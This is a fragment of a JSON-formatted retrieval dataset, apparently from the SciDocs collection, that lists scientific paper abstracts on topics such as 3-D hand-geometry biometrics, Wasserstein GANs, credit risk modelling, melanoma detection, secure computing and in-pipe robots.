"text": "Two-dimensional (2-D) hand-geometry features carry limited discriminatory information and therefore yield moderate performance when utilized for personal identification. This paper investigates a new approach to achieve performance improvement by simultaneously acquiring and combining three-dimensional (3-D) and 2-D features from the human hand. The proposed approach utilizes a 3-D digitizer to simultaneously acquire intensity and range images of the presented hands of the users in a completely contact-free manner. Two new representations that effectively characterize the local finger surface features are extracted from the acquired range images and are matched using the proposed matching metrics. In addition, the characterization of 3-D palm surface using SurfaceCode is proposed for matching a pair of 3-D palms. The proposed approach is evaluated on a database of 177 users acquired in two sessions. The experimental results suggest that the proposed 3-D hand-geometry features have significant discriminatory information to reliably authenticate individuals. Our experimental results demonstrate that consolidating 3-D and 2-D hand-geometry features results in significantly improved performance that cannot be achieved with the traditional 2-D hand-geometry features alone. Furthermore, this paper also investigates the performance improvement that can be achieved by integrating five biometric features, i.e., 2-D palmprint, 3-D palmprint, finger texture, along with 3-D and 2-D hand-geometry features, that are simultaneously extracted from the user's hand presented for authentication.",
"title": ""
},
{
"docid": "72b2bb4343c81576e208c2f678dae153",
"text": "We propose a novel class of statistical divergences called Relaxed Wasserstein (RW) divergence. RW divergence generalizes Wasserstein divergence and is parametrized by a class of strictly convex and differentiable functions. We establish for RW divergence several probabilistic properties, which are critical for the success of Wasserstein divergence. In particular, we show that RW divergence is dominated by Total Variation (TV) and Wasserstein-L divergence, and that RW divergence has continuity, differentiability and duality representation. Finally, we provide a non-asymptotic moment estimate and a concentration inequality for RW divergence. Our experiments on image generation demonstrate that RW divergence is a suitable choice for GANs. The performance of RWGANs with Kullback-Leibler (KL) divergence is competitive with other state-of-the-art GANs approaches. Moreover, RWGANs possess better convergence properties than the existing WGANs with competitive inception scores. To the best of our knowledge, this new conceptual framework is the first to provide not only the flexibility in designing effective GANs scheme, but also the possibility in studying different loss functions under a unified mathematical framework.",
"title": ""
},
{
"docid": "a6ab8363f9f790815f091a53713828a9",
"text": "This report reviews the structural approach for credit risk modelling, both considering the case of a single firm and the case with default dependences between firms. In the single firm case, we review the Merton (1974) model and first passage models, examining their main characteristics and extensions. Liquidation process models extend first passage models to account for the possibility of a lengthy liquidation process which might or might not end up in default. Finally, we review structural models with state dependent cash flows (recession vs. expansion) or debt coupons (ratingbased). The estimation of structural models is addressed, covering the different ways proposed in the literature. In the second part of the text, we present some approaches to model default dependences between firms. They account for two types of default correlations: cyclical default correlation and contagion effects. We close the paper with a brief mention of factor models. The paper pretends to be a guide to the literature, providing a comprehensive list of references and, along the way, suggesting different possible extensions for its future development. JEL Codes:",
"title": ""
},
{
"docid": "c608e8eca5f584f9da999b7d39de1fea",
"text": "In this paper, we propose a novel approach to discriminate malignant melanomas and benign atypical nevi, since both types of melanocytic skin lesions have very similar characteristics. Recent studies involving the non-invasive diagnosis of melanoma indicate that the concentrations of the two main classes of melanin present in the human skin, eumelanin and pheomelanin, can potentially be used in the computation of relevant features to differentiate these lesions. So, we describe how these features can be estimated using only standard camera images. Moreover, we demonstrate that using these features in conjunction with features based on the well known ABCD rule, it is possible to achieve 100% of sensitivity and more than 99% accuracy in melanocytic skin lesion discrimination, which is a highly desirable characteristic in a prescreening system. 2013 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "9d97e4d697f10d07ace5e437ba884946",
"text": "This paper focuses on the feature gene selection for cancer classification, which employs an optimization algorithm to select a subset of the genes. We propose a binary quantum-behaved particle swarm optimization (BQPSO) for cancer feature gene selection, coupling support vector machine (SVM) for cancer classification. First, the proposed BQPSO algorithm is described, which is a discretized version of original QPSO for binary 0-1 optimization problems. Then, we present the principle and procedure for cancer feature gene selection and cancer classification based on BQPSO and SVM with leave-one-out cross validation (LOOCV). Finally, the BQPSO coupling SVM (BQPSO/SVM), binary PSO coupling SVM (BPSO/SVM), and genetic algorithm coupling SVM (GA/SVM) are tested for feature gene selection and cancer classification on five microarray data sets, namely, Leukemia, Prostate, Colon, Lung, and Lymphoma. The experimental results show that BQPSO/SVM has significant advantages in accuracy, robustness, and the number of feature genes selected compared with the other two algorithms.",
"title": ""
},
{
"docid": "51793d81dd923b59f764dcb4c8a0343f",
"text": "Augmented Reality (AR) systems which use optical tracking with fiducial marker for registration have had an important role in popularizing this technology, since only a personal computer with a conventional webcam is required. However, in most these applications, the virtual elements are shown only in the foreground a real element does not occlude a virtual one. The method presented enables AR environments based on fiducial markers to support mutual occlusion between a real element and many virtual ones, according to the elements position (depth) in the environment.",
"title": ""
},
{
"docid": "49b0ba019f6f968804608aeacec2a959",
"text": "In this paper, we introduce a novel problem of audio-visual event localization in unconstrained videos. We define an audio-visual event as an event that is both visible and audible in a video segment. We collect an Audio-Visual Event (AVE) dataset to systemically investigate three temporal localization tasks: supervised and weakly-supervised audio-visual event localization, and cross-modality localization. We develop an audio-guided visual attention mechanism to explore audio-visual correlations, propose a dual multimodal residual network (DMRN) to fuse information over the two modalities, and introduce an audio-visual distance learning network to handle the cross-modality localization. Our experiments support the following findings: joint modeling of auditory and visual modalities outperforms independent modeling, the learned attention can capture semantics of sounding objects, temporal alignment is important for audio-visual fusion, the proposed DMRN is effective in fusing audio-visual features, and strong correlations between the two modalities enable cross-modality localization.",
"title": ""
},
{
"docid": "1febb341f4fa0227683f3edbe8b95ff3",
"text": "Distributed representation learned with neural networks has recently shown to be effective in modeling natural languages at fine granularities such as words, phrases, and even sentences. Whether and how such an approach can be extended to help model larger spans of text, e.g., documents, is intriguing, and further investigation would still be desirable. This paper aims to enhance neural network models for such a purpose. A typical problem of document-level modeling is automatic summarization, which aims to model documents in order to generate summaries. In this paper, we propose neural models to train computers not just to pay attention to specific regions and content of input documents with attention models, but also distract them to traverse between different content of a document so as to better grasp the overall meaning for summarization. Without engineering any features, we train the models on two large datasets. The models achieve the state-of-the-art performance, and they significantly benefit from the distraction modeling, particularly when input documents are long.",
"title": ""
},
{
"docid": "0ef01fb9322ed10529f074ef73e9a19f",
"text": "Detecting the document focus time, defined as the time the content of a document refers to, is an important task to support temporal information retrieval systems. In this paper we propose a novel approach to focus time estimation based on a bag-of-entity representation. In particular, we are interested in understanding if and to what extent existing open data sources can be leveraged to achieve focus time estimation. We leverage state of the art Named Entity Extraction tools and exploit links to Wikipedia and DBpedia to derive temporal information relevant to entities, namely years and intervals of years. We then estimate focus time as the point in time that is more relevant to the entity set associated to a document. Our method does not rely on explicit temporal expressions in the documents, so it is therefore applicable to a general context. We tested our methodology on two datasets of historical events and evaluated it against a state of the art approach, measuring improvement in average estimation error.",
"title": ""
},
{
"docid": "ada1fa32b0d44f04f5e1715d368ad50d",
"text": "Inductive synthesis, or programming-by-examples (PBE) is gaining prominence with disruptive applications for automating repetitive tasks in end-user programming. However, designing, developing, and maintaining an effective industrial-quality inductive synthesizer is an intellectual and engineering challenge, requiring 1-2 man-years of effort. Our novel observation is that many PBE algorithms are a natural fall-out of one generic meta-algorithm and the domain-specific properties of the operators in the underlying domain-specific language (DSL). The meta-algorithm propagates example-based constraints on an expression to its subexpressions by leveraging associated witness functions, which essentially capture the inverse semantics of the underlying operator. This observation enables a novel program synthesis methodology called data-driven domain-specific deduction (D4), where domain-specific insight, provided by the DSL designer, is separated from the synthesis algorithm. Our FlashMeta framework implements this methodology, allowing synthesizer developers to generate an efficient synthesizer from the mere DSL definition (if properties of the DSL operators have been modeled). In our case studies, we found that 10+ existing industrial-quality mass-market applications based on PBE can be cast as instances of D4. Our evaluation includes reimplementation of some prior works, which in FlashMeta become more efficient, maintainable, and extensible. As a result, FlashMeta-based PBE tools are deployed in several industrial products, including Microsoft PowerShell 3.0 for Windows 10, Azure Operational Management Suite, and Microsoft Cortana digital assistant.",
"title": ""
},
{
"docid": "4b8a46065520d2b7489bf0475321c726",
"text": "With computing increasingly becoming more dispersed, relying on mobile devices, distributed computing, cloud computing, etc. there is an increasing threat from adversaries obtaining physical access to some of the computer systems through theft or security breaches. With such an untrusted computing node, a key challenge is how to provide secure computing environment where we provide privacy and integrity for data and code of the application. We propose SecureME, a hardware-software mechanism that provides such a secure computing environment. SecureME protects an application from hardware attacks by using a secure processor substrate, and also from the Operating System (OS) through memory cloaking, permission paging, and system call protection. Memory cloaking hides data from the OS but allows the OS to perform regular virtual memory management functions, such as page initialization, copying, and swapping. Permission paging extends the OS paging mechanism to provide a secure way for two applications to establish shared pages for inter-process communication. Finally, system call protection applies spatio-temporal protection for arguments that are passed between the application and the OS. Based on our performance evaluation using microbenchmarks, single-program workloads, and multiprogrammed workloads, we found that SecureME only adds a small execution time overhead compared to a fully unprotected system. Roughly half of the overheads are contributed by the secure processor substrate. SecureME also incurs a negligible additional storage overhead over the secure processor substrate.",
"title": ""
},
{
"docid": "882248356efb7b81fde7e569e261a88d",
"text": "Band clamps with a flat bottomed V-section are used to connect a pair of circular flanges to provide a joint with significant axial strength. Despite the wide application of V-band clamps, their behaviour is not fully understood and the ultimate axial strength is currently only available from physical testing. This physical testing has indicated that the ultimate strength is determined by two different types of structural deformation, an elastic deformation mode and a plastic deformation mode. Initial finite element analysis work has demonstrated that analysis of this class of problem is not straightforward. This paper discusses the difficulties encountered when simulating this type of component interaction where contact is highly localised and contact pressures are high and therefore presents a finite element model to predict the ultimate axial load capacity of V-band clamps.",
"title": ""
},
{
"docid": "afdb022bd163c1d5af226dc9624c1aee",
"text": "Sapienza University of Rome, Italy 1.",
"title": ""
},
{
"docid": "e887653429edaefd4ef08c9b15feb872",
"text": "The level of presence, or immersion, a person feels with media influences the effect media has on them. This project examines both the causes and consequences of presence in the context of violent video game play. In a between subjects design, 227 participants were randomly assigned to play either a violent or a non violent video game. Causal modeling techniques revealed two separate paths to presence. First, individual differences predicted levels of presence: men felt more presence while playing the video game, as did those who play video games more frequently. Secondly, those who perceived the game to be more violent felt more presence. Those who felt more presence, felt more resentment, were more verbally aggressive, and that led to increased physically aggressive intentions. Keywords--Presence as immersion, video games, aggressive affect, violence, aggression, and social learning theory.",
"title": ""
},
{
"docid": "914f41b9f3c0d74f888c7dd83e226468",
"text": "We present a new algorithm for inferring the home location of Twitter users at different granularities, including city, state, time zone, or geographic region, using the content of users’ tweets and their tweeting behavior. Unlike existing approaches, our algorithm uses an ensemble of statistical and heuristic classifiers to predict locations and makes use of a geographic gazetteer dictionary to identify place-name entities. We find that a hierarchical classification approach, where time zone, state, or geographic region is predicted first and city is predicted next, can improve prediction accuracy. We have also analyzed movement variations of Twitter users, built a classifier to predict whether a user was travelling in a certain period of time, and use that to further improve the location detection accuracy. Experimental evidence suggests that our algorithm works well in practice and outperforms the best existing algorithms for predicting the home location of Twitter users.",
"title": ""
},
{
"docid": "b92ab7a58d1b4218b6d6554c269aefca",
"text": "Pipelines are important infrastructures in today's society. To avoid leakages in these pipelines, efficient robotic pipe inspections are required, and to this date, various types of in-pipe robots have been developed. Some of them can select their path at a T-branch at the expense of additional actuators. However, fewer actuators are better in terms of size reduction, energy conservation, production cost, and maintenance. To reduce the number of actuators, a screw drive mechanism with only one actuator has been developed for propelling an in-pipe robot through straight pipes and elbow pipes. Based on this screw drive mechanism, in this paper, we develop a novel robot that uses only two motors and can select pathways. The robot has three locomotion modes: screw driving, steering, and rolling modes. These modes enable the robot to navigate not only through straight pipes but also elbow pipes and T-branches. We performed experiments to verify the validity of the proposed mechanism.",
"title": ""
},
{
"docid": "c751115c128fd0776baf212ae19624ff",
"text": "This paper presents a natural language interface to relational database. It introduces some classical NLDBI products and their applications and proposes the architecture of a new NLDBI system including its probabilistic context free grammar, the inside and outside probabilities which can be used to construct the parse tree, an algorithm to calculate the probabilities, and the usage of dependency structures and verb subcategorization in analyzing the parse tree. Some experiment results are given to conclude the paper.",
"title": ""
},
{
"docid": "65ce54d9733d8978c68eb4fe35ce430d",
"text": "Digital photographs are replacing tradition films in our daily life and the quantity is exploding. This stimulates the strong need for efficient management tools, in which the annotation of “who” in each photo is essential. In this paper, we propose an automated method to annotate family photos using evidence from face, body and context information. Face recognition is the first consideration. However, its performance is limited by the uncontrolled condition of family photos. In family album, the same groups of people tend to appear in similar events, in which they tend to wear the same clothes within a short time duration and in nearby places. We could make use of social context information and body information to estimate the probability of the persons’ presence and identify other examples of the same recognized persons. In our approach, we first use social context information to cluster photos into events. Within each event, the body information is clustered, and then combined with face recognition results using a graphical model. Finally, the clusters with high face recognition confidence and context probabilities are identified as belonging to specific person. Experiments on a photo album containing over 1500 photos demonstrate that our approach is effective.",
"title": ""
},
{
"docid": "8ab92b0433199ab915b5cf4309660395",
"text": "Within the large body of research in complex network analysis, an important topic is the temporal evolution of networks. Existing approaches aim at analyzing the evolution on the global and the local scale, extracting properties of either the entire network or local patterns. In this paper, we focus instead on detecting clusters of temporal snapshots of a network, to be interpreted as eras of evolution. To this aim, we introduce a novel hierarchical clustering methodology, based on a dissimilarity measure (derived from the Jaccard coefficient) between two temporal snapshots of the network. We devise a framework to discover and browse the eras, either in top-down or a bottom-up fashion, supporting the exploration of the evolution at any level of temporal resolution. We show how our approach applies to real networks, by detecting eras in an evolving co-authorship graph extracted from a bibliographic dataset; we illustrate how the discovered temporal clustering highlights the crucial moments when the network had profound changes in its structure. Our approach is finally boosted by introducing a meaningful labeling of the obtained clusters, such as the characterizing topics of each discovered era, thus adding a semantic dimension to our analysis.",
"title": ""
},
{
"docid": "96a0e29eb5a55f71bce6d51ce0fedc7d",
"text": "This article describes a new method for assessing the effect of a given film on viewers’ brain activity. Brain activity was measured using functional magnetic resonance imaging (fMRI) during free viewing of films, and inter-subject correlation analysis (ISC) was used to assess similarities in the spatiotemporal responses across viewers’ brains during movie watching. Our results demonstrate that some films can exert considerable control over brain activity and eye movements. However, this was not the case for all types of motion picture sequences, and the level of control over viewers’ brain activity differed as a function of movie content, editing, and directing style. We propose that ISC may be useful to film studies by providing a quantitative neuroscientific assessment of the impact of different styles of filmmaking on viewers’ brains, and a valuable method for the film industry to better assess its products. Finally, we suggest that this method brings together two separate and largely unrelated disciplines, cognitive neuroscience and film studies, and may open the way for a new interdisciplinary field of “neurocinematic” studies.",
"title": ""
}
] | scidocsrr |
52577cff171aeb15c77eff1574d7a574 | Topic Models For Feature Selection in Document Clustering | [
{
"docid": "5d6c2580602945084d5a643c335c40f2",
"text": "Probabilistic topic models are a suite of algorithms whose aim is to discover the hidden thematic structure in large archives of documents. In this article, we review the main ideas of this field, survey the current state-of-the-art, and describe some promising future directions. We first describe latent Dirichlet allocation (LDA) [8], which is the simplest kind of topic model. We discuss its connections to probabilistic modeling, and describe two kinds of algorithms for topic discovery. We then survey the growing body of research that extends and applies topic models in interesting ways. These extensions have been developed by relaxing some of the statistical assumptions of LDA, incorporating meta-data into the analysis of the documents, and using similar kinds of models on a diversity of data types such as social networks, images and genetics. Finally, we give our thoughts as to some of the important unexplored directions for topic modeling. These include rigorous methods for checking models built for data exploration, new approaches to visualizing text and other high dimensional data, and moving beyond traditional information engineering applications towards using topic models for more scientific ends.",
"title": ""
},
{
"docid": "77efc89b550a9982f1fb73668e1221c3",
"text": "Supervised topic models utilize document's side information for discovering predictive low dimensional representations of documents; and existing models apply likelihood-based estimation. In this paper, we present a max-margin supervised topic model for both continuous and categorical response variables. Our approach, the maximum entropy discrimination latent Dirichlet allocation (MedLDA), utilizes the max-margin principle to train supervised topic models and estimate predictive topic representations that are arguably more suitable for prediction. We develop efficient variational methods for posterior inference and demonstrate qualitatively and quantitatively the advantages of MedLDA over likelihood-based topic models on movie review and 20 Newsgroups data sets.",
"title": ""
},
{
"docid": "335847313ee670dc0648392c91d8567a",
"text": "Several large scale data mining applications, such as text c ategorization and gene expression analysis, involve high-dimensional data that is also inherentl y directional in nature. Often such data is L2 normalized so that it lies on the surface of a unit hyperspher e. Popular models such as (mixtures of) multi-variate Gaussians are inadequate for characteri zing such data. This paper proposes a generative mixture-model approach to clustering directional data based on the von Mises-Fisher (vMF) distribution, which arises naturally for data distributed on the unit hypersphere. In particular, we derive and analyze two variants of the Expectation Maximiza tion (EM) framework for estimating the mean and concentration parameters of this mixture. Nume rical estimation of the concentration parameters is non-trivial in high dimensions since it i nvolves functional inversion of ratios of Bessel functions. We also formulate two clustering algorit hms corresponding to the variants of EM that we derive. Our approach provides a theoretical basis fo r the use of cosine similarity that has been widely employed by the information retrieval communit y, and obtains the spherical kmeans algorithm (kmeans with cosine similarity) as a special case of both variants. Empirical results on clustering of high-dimensional text and gene-expression d ata based on a mixture of vMF distributions show that the ability to estimate the concentration pa rameter for each vMF component, which is not present in existing approaches, yields superior resu lts, especially for difficult clustering tasks in high-dimensional spaces.",
"title": ""
}
] | [
{
"docid": "e100a602848dcba4a2e9575148486f9c",
"text": "The increasing integration of decentralized electrical sources is attended by problems with power quality, safe grid operation and grid stability. The concept of the Virtual Synchronous Machine (VISMA) [1] discribes an inverter to particularly connect renewable electrical sources to the grid that provides a wide variety of static an dynamic properties they are also suitable to achieve typical transient and oscillation phenomena in decentralized as well as weak grids. Furthermore in static operation, power plant controlled VISMA systems are capable to cope with critical surplus production of renewable electrical energy without additional communication systems only conducted by the grid frequency. This paper presents the dynamic properties \"damping\" and \"virtual mass\" of the VISMA and their contribution to the stabilization of the grid frequency and the attenuation of grid oscillations examined in an experimental grid set.",
"title": ""
},
{
"docid": "1e5e001871d20eae3f0c3d7f1acfd98d",
"text": "In this paper, a novel type auxiliary active resonant capacitor snubber assisted zero current soft switching pulse modulation single-ended push pull (SEPP) series load resonant inverter with two auxiliary resonant lossless inductor snubbers is proposed for consumer high-frequency induction heating (IH) appliances. Its operating principle in steady state is described by using each mode equivalent circuits. The new multi resonant high-frequency inverter can regulate its output power under a condition of a constant frequency zero current soft switching (ZCS) commutation principle on the basis of asymmetrical PWM control scheme. The consumer brand-new IH products using proposed ZCS-PWM series load resonant SEPP high-frequency inverter is evaluated and discussed as compared with conventional high-frequency inverter on the basis of experimental results. In order to extend ZCS operation ranges under a low power setting PWM, the pulse density modulation (PDM) strategy is demonstrated for high frequency multi resonant inverter. Its practical effectiveness is substantially proved from an application point of view",
"title": ""
},
{
"docid": "12866e003093bc7d89d751697f2be93c",
"text": "We argue that the right way to understand distributed protocols is by considering how messages change the state of knowledge of a system. We present a hierarchy of knowledge states that a system may be in, and discuss how communication can move the system's state of knowledge of a fact up the hierarchy. Of special interest is the notion of common knowledge. Common knowledge is an essential state of knowledge for reaching agreements and coordinating action. We show that in practical distributed systems, common knowledge is not attainable. We introduce various relaxations of common knowledge that are attainable in many cases of interest. We describe in what sense these notions are appropriate, and discuss their relationship to each other. We conclude with a discussion of the role of knowledge in distributed systems.",
"title": ""
},
{
"docid": "83f45a393c3e8bfbcfd8ddda39ca44c8",
"text": "Open-access 802.11 wireless networks are commonly deployed in cafes, bookstores, and other public spaces to provide free Internet connectivity. These networks are convenient to deploy, requiring no out-of-band key exchange or prior trust relationships. However, such networks are vulnerable to a variety of threats including the evil twin attack where an adversary clones a client's previously-used access point for a variety of malicious purposes including malware injection or identity theft. We propose defenses that aim to maintain the simplicity, convenience, and usability of open-access networks while offering increased protection from evil twin attacks. First, we present an evil twin detection strategy called context-leashing that constrains access point trust by location. Second, we propose that wireless networks be identified by uncertified public keys and design an SSH-style authentication and session key establishment protocol that fits into the 802.1X standard. Lastly, to mitigate the pitfalls of SSH-style authentication, we present a crowd-sourcing-based reporting protocol that provides historical information for access point public keys while preserving the location privacy of users who contribute reports.",
"title": ""
},
{
"docid": "72b25e72706720f71ebd6fe8cf769df5",
"text": "This paper reports our recent result in designing a function for autonomous APs to estimate throughput and delay of its clients in 2.4GHz WiFi channels to support those APs' dynamic channel selection. Our function takes as inputs the traffic volume and strength of signals emitted from nearby interference APs as well as the target AP's traffic volume. By this function, the target AP can estimate throughput and delay of its clients without actually moving to each channel, it is just required to monitor IEEE802.11 MAC frames sent or received by the interference APs. The function is composed of an SVM-based classifier to estimate capacity saturation and a regression function to estimate both throughput and delay in case of saturation in the target channel. The training dataset for the machine learning is created by a highly-precise network simulator. We have conducted over 10,000 simulations to train the model, and evaluated using additional 2,000 simulation results. The result shows that the estimated throughput error is less than 10%.",
"title": ""
},
{
"docid": "6358eb0078470ef55647184763ba1ccf",
"text": "In this review the application of deep learning for medical diagnosis is addressed. A thorough analysis of various scientific articles in the domain of deep neural networks application in the medical field has been conducted. More than 300 research articles were obtained, and after several selection steps, 46 articles were presented in more detail. The results indicate that convolutional neural networks (CNN) are the most widely represented when it comes to deep learning and medical image analysis. Furthermore, based on the findings of this article, it can be noted that the application of deep learning technology is widespread, but the majority of applications are focused on bioinformatics, medical diagnosis and other similar fields.",
"title": ""
},
{
"docid": "05b4df16c35a89ee2a5b9ac482e0a297",
"text": "Intensity-based classification of MR images has proven problematic, even when advanced techniques are used. Intrascan and interscan intensity inhomogeneities are a common source of difficulty. While reported methods have had some success in correcting intrascan inhomogeneities, such methods require supervision for the individual scan. This paper describes a new method called adaptive segmentation that uses knowledge of tissue intensity properties and intensity inhomogeneities to correct and segment MR images. Use of the expectation-maximization (EM) algorithm leads to a method that allows for more accurate segmentation of tissue types as well as better visualization of magnetic resonance imaging (MRI) data, that has proven to be effective in a study that includes more than 1000 brain scans. Implementation and results are described for segmenting the brain in the following types of images: axial (dual-echo spin-echo), coronal [three dimensional Fourier transform (3-DFT) gradient-echo T1-weighted] all using a conventional head coil, and a sagittal section acquired using a surface coil. The accuracy of adaptive segmentation was found to be comparable with manual segmentation, and closer to manual segmentation than supervised multivariant classification while segmenting gray and white matter.",
"title": ""
},
{
"docid": "fd14310dd9a039175c075059e4ed31e4",
"text": "A new self-reconfigurable robot is presented. The robot is a hybrid chain/lattice design with several novel features. An active mechanical docking mechanism provides inter-module connection, along with optical and electrical interface. The docking mechanisms function additionally as driven wheels. Internal slip rings provide unlimited rotary motion to the wheels, allowing the modules to move independently by driving on flat surfaces, or in assemblies negotiating more complex terrain. Modules in the system are mechanically homogeneous, with three identical docking mechanisms within a module. Each mechanical dock is driven by a high torque actuator to enable movement of large segments within a multi-module structure, as well as low-speed driving. Preliminary experimental results demonstrate locomotion, mechanical docking, and lifting of a single module.",
"title": ""
},
{
"docid": "158c535b44fe81ca7194d5a0b386f2b5",
"text": "Deep networks are increasingly being applied to problems involving image synthesis, e.g., generating images from textual descriptions and reconstructing an input image from a compact representation. Supervised training of image-synthesis networks typically uses a pixel-wise loss (PL) to indicate the mismatch between a generated image and its corresponding target image. We propose instead to use a loss function that is better calibrated to human perceptual judgments of image quality: the multiscale structural-similarity score (MS-SSIM) [1]. Because MS-SSIM is differentiable, it is easily incorporated into gradient-descent learning. We compare the consequences of using MS-SSIM versus PL loss on training autoencoders. Human observers reliably prefer images synthesized by MS-SSIM-optimized models over those synthesized by PL-optimized models, for two distinct PL measures (L1 and L2 distances). We also explore the effect of training objective on image encoding and analyze conditions under which perceptually-optimized representations yield better performance on image classification. Finally, we demonstrate the superiority of perceptually-optimized networks for super-resolution imaging. We argue that significant advances can be made in modeling images through the use of training objectives that are well aligned to characteristics of human perception.",
"title": ""
},
{
"docid": "097cab15476b850df18e625530c25821",
"text": "The Internet of Things (IoT) has been growing in recent years with the improvements in several different applications in the military, marine, intelligent transportation, smart health, smart grid, smart home and smart city domains. Although IoT brings significant advantages over traditional information and communication (ICT) technologies for Intelligent Transportation Systems (ITS), these applications are still very rare. Although there is a continuous improvement in road and vehicle safety, as well as improvements in IoT, the road traffic accidents have been increasing over the last decades. Therefore, it is necessary to find an effective way to reduce the frequency and severity of traffic accidents. Hence, this paper presents an intelligent traffic accident detection system in which vehicles exchange their microscopic vehicle variables with each other. The proposed system uses simulated data collected from vehicular ad-hoc networks (VANETs) based on the speeds and coordinates of the vehicles and then, it sends traffic alerts to the drivers. Furthermore, it shows how machine learning methods can be exploited to detect accidents on freeways in ITS. It is shown that if position and velocity values of every vehicle are given, vehicles' behavior could be analyzed and accidents can be detected easily. Supervised machine learning algorithms such as Artificial Neural Networks (ANN), Support Vector Machine (SVM), and Random Forests (RF) are implemented on traffic data to develop a model to distinguish accident cases from normal cases. The performance of RF algorithm, in terms of its accuracy, was found superior to ANN and SVM algorithms. RF algorithm has showed better performance with 91.56% accuracy than SVM with 88.71% and ANN with 90.02% accuracy.",
"title": ""
},
{
"docid": "2bb0681d393aa600854d66253a43e10b",
"text": "Traditional i-vector speaker recognition systems use a Gaussian mixture model (GMM) to collect sufficient statistics. Recently, replacing this GMM with a deep neural network (DNN) has shown promising results. In this paper, we study a number of open issues that relate to performance, computational complexity, and applicability of DNNs as part of the full speaker recognition pipeline. The experimental validation is performed on the female part of the SRE12 telephone condition 2, where our DNN-based system produces the best published results. The insights gained by our study indicate that, for the purpose of speaker recognition, not using fMLLR speaker adaptation and early stopping of the DNN training allow significant computational reduction without sacrificing performance. Also, using a full covariance universal background model (UBM) and a large set of senones produces important performance gains. Finally, the DNN-based approach does not exhibit a strong language dependence as a DNN trained on Spanish data outperforms the conventional GMM-based system on our English task.",
"title": ""
},
{
"docid": "5184c27b7387a0cbedb1c3a393f797fa",
"text": "Emulator-based dynamic analysis has been widely deployed in Android application stores. While it has been proven effective in vetting applications on a large scale, it can be detected and evaded by recent Android malware strains that carry detection heuristics. Using such heuristics, an application can check the presence or contents of certain artifacts and infer the presence of emulators. However, there exists little work that systematically discovers those heuristics that would be eventually helpful to prevent malicious applications from bypassing emulator-based analysis. To cope with this challenge, we propose a framework called Morpheus that automatically generates such heuristics. Morpheus leverages our insight that an effective detection heuristic must exploit discrepancies observable by an application. To this end, Morpheus analyzes the application sandbox and retrieves observable artifacts from both Android emulators and real devices. Afterwards, Morpheus further analyzes the retrieved artifacts to extract and rank detection heuristics. The evaluation of our proof-of-concept implementation of Morpheus reveals more than 10,000 novel detection heuristics that can be utilized to detect existing emulator-based malware analysis tools. We also discuss the discrepancies in Android emulators and potential countermeasures.",
"title": ""
},
{
"docid": "8d50065318c1df7c687db28c9894dcb4",
"text": "This paper describes a method for synthesizing images that match the texture appearanceof a given digitized sample. This synthesis is completely automatic and requires only the “target” texture as input. It allows generation of as much texture as desired so that any object can be covered. It can be used to produce solid textures for creating textured 3-d objects without the distortions inherent in texture mapping. It can also be used to synthesize texture mixtures, images that look a bit like each of several digitized samples. The approach is based on a model of human texture perception, and has potential to be a practically useful tool for graphics applications.",
"title": ""
},
{
"docid": "d07d6fe33b01fbfb21ba5adc76ec786f",
"text": "Dunaliella salina (Dunal) Teod, a unicellular eukaryotic green alga, is a highly salt-tolerant organism. To identify novel genes with potential roles in salinity tolerance, a salt stress-induced D. salina cDNA library was screened based on the expression in Haematococcus pluvialis, an alga also from Volvocales but one that is hypersensitive to salt. Five novel salt-tolerant clones were obtained from the library. Among them, Ds-26-16 and Ds-A3-3 contained the same open reading frame (ORF) and encoded a 6.1 kDa protein. Transgenic tobacco overexpressing Ds-26-16 and Ds-A3-3 exhibited increased leaf area, stem height, root length, total chlorophyll, and glucose content, but decreased proline content, peroxidase activity, and ascorbate content, and enhanced transcript level of Na+/H+ antiporter salt overly sensitive 1 gene (NtSOS1) expression, compared to those in the control plants under salt condition, indicating that Ds-26-16 enhanced the salt tolerance of tobacco plants. The transcript of Ds-26-16 in D. salina was upregulated in response to salt stress. The expression of Ds-26-16 in Escherichia coli showed that the ORF contained the functional region and changed the protein(s) expression profile. A mass spectrometry assay suggested that the most abundant and smallest protein that changed is possibly a DNA-binding protein or Cold shock-like protein. Subcellular localization analysis revealed that Ds-26-16 was located in the nuclei of onion epidermal cells or nucleoid of E. coli cells. In addition, the possible use of shoots regenerated from leaf discs to quantify the salt tolerance of the transgene at the initial stage of tobacco transformation was also discussed.",
"title": ""
},
{
"docid": "49c7d088e4122831eddfe864a44b69ca",
"text": "Common approaches to multi-label classification learn independent classifiers for each category, and employ ranking or thresholding schemes for classification. Because they do not exploit dependencies between labels, such techniques are only well-suited to problems in which categories are independent. However, in many domains labels are highly interdependent. This paper explores multi-label conditional random field (CRF)classification models that directly parameterize label co-occurrences in multi-label classification. Experiments show that the models outperform their single-label counterparts on standard text corpora. Even when multi-labels are sparse, the models improve subset classification error by as much as 40%.",
"title": ""
},
{
"docid": "1053653b3584180dd6f97866c13ce40a",
"text": "• • The order of authorship on this paper is random and contributions were equal. We would like to thank Ron Burt, Jim March and Mike Tushman for many helpful suggestions. Olav Sorenson provided particularly extensive comments on this paper. We would like to acknowledge the financial support of the University of Chicago, Graduate School of Business and a grant from the Kauffman Center for Entrepreneurial Leadership. Clarifying the relationship between organizational aging and innovation processes is an important step in understanding the dynamics of high-technology industries, as well as for resolving debates in organizational theory about the effects of aging on organizational functioning. We argue that aging has two seemingly contradictory consequences for organizational innovation. First, we believe that aging is associated with increases in firms' rates of innovation. Simultaneously, however, we argue that the difficulties of keeping pace with incessant external developments causes firms' innovative outputs to become obsolete relative to the most current environmental demands. These seemingly contradictory outcomes are intimately related and reflect inherent trade-offs in organizational learning and innovation processes. Multiple longitudinal analyses of the relationship between firm age and patenting behavior in the semiconductor and biotechnology industries lend support to these arguments. Introduction In an increasingly knowledge-based economy, pinpointing the factors that shape the ability of organizations to produce influential ideas and innovations is a central issue for organizational studies. Among all organizational outputs, innovation is fundamental not only because of its direct impact on the viability of firms, but also because of its profound effects on the paths of social and economic change. In this paper, we focus on an ubiquitous organizational process-aging-and examine its multifaceted influence on organizational innovation. In so doing, we address an important unresolved issue in organizational theory, namely the nature of the relationship between aging and organizational behavior (Hannan 1998). Evidence clarifying the relationship between organizational aging and innovation promises to improve our understanding of the organizational dynamics of high-technology markets, and in particular the dynamics of technological leadership. For instance, consider the possibility that aging has uniformly positive consequences for innovative activity: on the foundation of accumulated experience, older firms innovate more frequently, and their innovations have greater significance than those of younger enterprises. In this scenario, technological change paradoxically may be associated with organizational stability, as incumbent organizations come to dominate the technological frontier and their preeminence only increases with their tenure. 1 Now consider the …",
"title": ""
},
{
"docid": "d5d789344f9678ce4d6a9e9646c908c8",
